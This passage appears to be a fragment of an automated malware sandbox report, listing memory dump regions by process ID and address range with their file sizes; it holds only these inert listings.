                                                                                                                                                      • memory/4496-4237-0x000001DC250F0000-0x000001DC250F8000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        32KB

                                                                                                                                                      • memory/4508-227-0x0000000000A70000-0x0000000001304000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        8.6MB

                                                                                                                                                      • memory/4824-329-0x0000000000A70000-0x0000000001304000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        8.6MB

                                                                                                                                                      • memory/4828-343-0x0000000000A70000-0x0000000001304000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        8.6MB

                                                                                                                                                      • memory/4976-325-0x0000000000A70000-0x0000000001304000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        8.6MB

                                                                                                                                                      • memory/5108-309-0x0000000000A70000-0x0000000001304000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        8.6MB